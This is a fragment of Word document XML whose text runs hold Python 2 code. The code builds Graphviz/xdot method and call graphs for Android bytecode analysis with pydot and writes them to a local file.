      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    method = None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    vmx = None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    buff = None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    xdot = None</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def __init__(self, method, vm, vmx):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.method = method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.vmx = vmx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff = ""</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def method2xdot(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        import pydot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff = "digraph code {\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff += "graph [bgcolor=white];\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff += "node [color=red, style=filled shape=box fontname=\"Courier\" fontsize=\"8\"];\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff += "splines=ortho"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff += bytecode.method2dot(self.vmx.get_method(self.method))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff += "}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        d = pydot.graph_from_dot_data(self.buff)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if d:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.xdot = d.create_xdot()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            print "method2xdot\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>#            print self.buff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            file = open('method2dot.txt','a')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            file.write("%s\n" % self.xdot)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            file.close</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yuan build the call graph</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    def call2xdot(self, methodInvokeList, allmethod):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        import pydot</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callInOut = CallInOut(methodInvokeList)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        className = self.method.get_class_name()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        methodName = self.method.get_name()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        descriptor = self.method.get_descriptor()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        callMethod = className + " " + descriptor + "," + methodName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        callInList= callInOut.searchCallIn(callMethod)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        callOutList = callInOut.searchCallOut(callMethod)</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Dir = callInOut.invokeDir2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        callList = []</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label = ""</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self.buff = "digraph code {\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff += "graph [bgcolor=white];\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff += "node [color=lightgray, style=filled shape=box fontname=\"Courier\" fontsize=\"8\"];\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.buff += "splines=ortho"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        i = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        j = 100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        label2name = {}</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for I in allmethod:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            i += 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            Im = I.get_class_name() + " " + I.get_descriptor() +"," + I.get_name()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            node_name = "%s" % i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            label = Im</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            label2name[label] = node_name</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self.buff += "\"%s\" [color=\"lightgray\", label=\"%s\"]\n" % (node_name, label)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        print "total method count = %s" % i</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for I in allmethod:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">              Im = I.get_class_name() + " " + I.get_descriptor() +"," + I.get_name()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">              if Im not in Dir.keys():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                   continue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">              callList = Dir[Im]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">              lenth = len(callList)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">              for l in range (0, lenth ):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                   col = "blue"</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if not label2name.has_key(Im):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     node_from = "node%s" % i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     label2name[Im] = node_from</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     self.buff += "\"%s\" [color=\"lightgray\", label=\"%s\"]\n" % (node_from, Im)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     i += 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                   else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     node_from = label2name[Im]</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if not label2name.has_key(callList[l]):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     node_to = "node%s" % i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     label2name[callList[l]] = node_to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     self.buff += "\"%s\" [color=\"lightgray\", label=\"%s\"]\n" % (node_to, callList[l])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     i += 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
